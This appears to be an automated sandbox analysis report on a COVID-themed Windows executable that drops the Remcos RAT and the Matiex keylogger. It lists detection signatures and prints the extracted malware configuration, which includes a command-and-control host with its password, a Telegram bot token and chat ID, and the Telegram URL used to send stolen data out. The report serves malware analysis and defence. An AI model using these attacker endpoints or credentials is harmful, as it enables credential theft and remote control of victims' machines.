Windows Analysis Report UK COVID UPDATES AND ENTITLEMENT.exe

Overview

General Information

Sample Name: UK COVID UPDATES AND ENTITLEMENT.exe
Analysis ID: 481891
MD5: fb465f2b05a6fdc86eb711d7e28e7010
SHA1: 8dd1e185249be7ae7e6ab546bf4c06b59f030d4c
SHA256: 85c6f9cc1d92580088ac090c6eeaba9169aa57290ee6568ef5278fc9170d11dc
Tags: exeRemcosRAT
Infos:

Most interesting Screenshot:

Detection

Remcos Matiex
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: Capture Wi-Fi password
Antivirus detection for dropped file
Found malware configuration
Yara detected Matiex Keylogger
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected Remcos RAT
Detected Remcos RAT
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Contains functionality to capture and log keystrokes
Uses netsh to modify the Windows network and firewall settings
Contains functionality to steal Firefox passwords or cookies
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
Yara detected Beds Obfuscator
May check the online IP address of the machine
Injects a PE file into a foreign processes
Contains functionality to inject code into remote processes
Tries to steal Mail credentials (via file access)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Tries to harvest and steal ftp login credentials
Tries to harvest and steal WLAN passwords
Contains functionality to detect virtual machines (IN, VMware)
Contains functionality to steal Chrome passwords or cookies
.NET source code contains method to dynamically call methods (often used by packers)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to shutdown / reboot the system
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to download and launch executables
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Avira: detection malicious, Label: TR/Redcap.jajcu
Found malware configuration
Source: 0000001C.00000002.468948804.0000000002900000.00000004.00000040.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": "tobi12345.hopto.org:40401:pass|", "Assigned name": "UKLEADS", "Connect interval": "5", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "UK.exe", "Startup value": "remcos", "Hide file": "Disable", "Mutex": "remcos_aqizussesx", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screens", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "audio", "Connect delay": "0", "Copy folder": "UK", "Keylog folder": "remcos"}
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.2ef094d.10.raw.unpack Malware Configuration Extractor: Matiex {"Exfil Mode": "Telegram", "Telegram Token": "1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM", "Telegram ID": "1120598411"}
Source: dwnl.exe.2896.33.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendMessage"}
Multi AV Scanner detection for submitted file
Source: UK COVID UPDATES AND ENTITLEMENT.exe Virustotal: Detection: 26% Perma Link
Source: UK COVID UPDATES AND ENTITLEMENT.exe ReversingLabs: Detection: 15%
Yara detected Remcos RAT
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3f255e8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.UK COVID UPDATES AND ENTITLEMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3efd5c8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3ed9988.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.2f737f0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3f255e8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.UK COVID UPDATES AND ENTITLEMENT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.2f737f0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3efd5c8.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001C.00000000.430910958.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.418169362.0000000002F23000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.468948804.0000000002900000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.429721772.0000000002900000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.429209935.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.432136781.0000000002900000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.418954944.0000000003ED9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.419012391.0000000003F25000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.467780819.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.418279701.0000000002F5D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: UK COVID UPDATES AND ENTITLEMENT.exe PID: 6360, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: UK COVID UPDATES AND ENTITLEMENT.exe PID: 6720, type: MEMORYSTR
Multi AV Scanner detection for domain / URL
Source: tobi12345.hopto.org Virustotal: Detection: 10% Perma Link
Source: tobi12345.hopto.org Virustotal: Detection: 10% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe ReversingLabs: Detection: 15%
Machine Learning detection for sample
Source: UK COVID UPDATES AND ENTITLEMENT.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.2f737f0.1.unpack Avira: Label: TR/Crypt.XPACK.Gen4
Source: 33.2.dwnl.exe.820000.0.unpack Avira: Label: TR/Redcap.jajcu
Source: 33.0.dwnl.exe.820000.0.unpack Avira: Label: TR/Redcap.jajcu

Compliance:

barindex
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 172.67.188.154:443 -> 192.168.2.5:49783 version: TLS 1.0
Uses 32bit PE files
Source: UK COVID UPDATES AND ENTITLEMENT.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49788 version: TLS 1.2
Source: UK COVID UPDATES AND ENTITLEMENT.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: cldapi.pdb_6 source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wininet.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: WinTypes.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000022.00000003.442720007.0000000003597000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: pnrpnsp.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000022.00000003.450304339.0000000005A61000.00000004.00000001.sdmp
Source: Binary string: NapiNSP.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000022.00000003.450304339.0000000005A61000.00000004.00000001.sdmp
Source: Binary string: NapiNSP.pdb^? source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: WINMMBASE.pdbb?r source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdbe6 source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000022.00000003.450408838.0000000005A35000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000022.00000003.443176095.0000000003591000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000022.00000003.450408838.0000000005A35000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: winnsi.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000022.00000003.450304339.0000000005A61000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000022.00000003.450304339.0000000005A61000.00000004.00000001.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000022.00000003.450408838.0000000005A35000.00000004.00000040.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 00000022.00000003.450399223.0000000005A30000.00000004.00000040.sdmp
Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: urlmon.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000022.00000003.450304339.0000000005A61000.00000004.00000001.sdmp
Source: Binary string: dnsapi.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdbd?x source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: upwntdll.pdb(/ source: WerFault.exe, 00000022.00000003.442299112.0000000005532000.00000004.00000001.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000022.00000003.442155176.000000000359D000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: msvcp60.pdbR?" source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000022.00000003.450304339.0000000005A61000.00000004.00000001.sdmp
Source: Binary string: wininet.pdb&?> source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: psapi.pdbL? source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: nlaapi.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: CLBCatQ.pdb=6 source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdbJ? source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: gdiplus.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb;6I source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: D:\Before FprmT\Document VB project\FireFox Stub\FireFox Stub\obj\Debug\VNXT.pdb source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001C.00000003.424932368.0000000002FAF000.00000004.00000001.sdmp, dwnl.exe, dwnl.exe.28.dr
Source: Binary string: WINMMBASE.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000022.00000003.443176095.0000000003591000.00000004.00000001.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000022.00000003.450304339.0000000005A61000.00000004.00000001.sdmp
Source: Binary string: apphelp.pdbc6 source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000022.00000003.450408838.0000000005A35000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: nsi.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: winmm.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: shcore.pdbx?t source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: winrnr.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net35/Newtonsoft.Json.pdb source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wmswsock.pdbv? source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wmswsock.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000022.00000003.450408838.0000000005A35000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: fwpuclnt.pdbo6 source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net35/Newtonsoft.Json.pdbSHA256/ source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp
Source: Binary string: D:\Before FprmT\Document VB project\FireFox Stub\FireFox Stub\obj\Debug\VNXT.pdbh} source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001C.00000003.424932368.0000000002FAF000.00000004.00000001.sdmp, dwnl.exe, 00000021.00000000.430155447.0000000000822000.00000002.00020000.sdmp, dwnl.exe.28.dr
Source: Binary string: iertutil.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000022.00000003.450399223.0000000005A30000.00000004.00000040.sdmp
Source: Binary string: psapi.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: ws2_32.pdbn?f source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000022.00000003.450408838.0000000005A35000.00000004.00000040.sdmp
Source: Binary string: cldapi.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: sechost.pdbk source: WerFault.exe, 00000022.00000003.450408838.0000000005A35000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000022.00000003.442155176.000000000359D000.00000004.00000001.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000022.00000003.450399223.0000000005A30000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000022.00000003.450399223.0000000005A30000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000022.00000003.450399223.0000000005A30000.00000004.00000040.sdmp
Source: Binary string: winmm.pdb(?$ source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: msvcp60.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000022.00000003.442720007.0000000003597000.00000004.00000001.sdmp
Source: Binary string: urlmon.pdb@? source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000022.00000003.450304339.0000000005A61000.00000004.00000001.sdmp
Source: Binary string: gdiplus.pdbT?( source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: rasadhlp.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdbk source: WerFault.exe, 00000022.00000003.450408838.0000000005A35000.00000004.00000040.sdmp
Source: Binary string: edputil.pdb source: WerFault.exe, 00000022.00000003.450423422.0000000005A38000.00000004.00000040.sdmp
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_0040BEA2 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,atoi,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU? 28_2_0040BEA2
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_0040A71E ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,FindCloseChangeNotification,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,atoi,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,URLDownloadToFileA,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,ShellExecuteA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@ 28_2_0040A71E
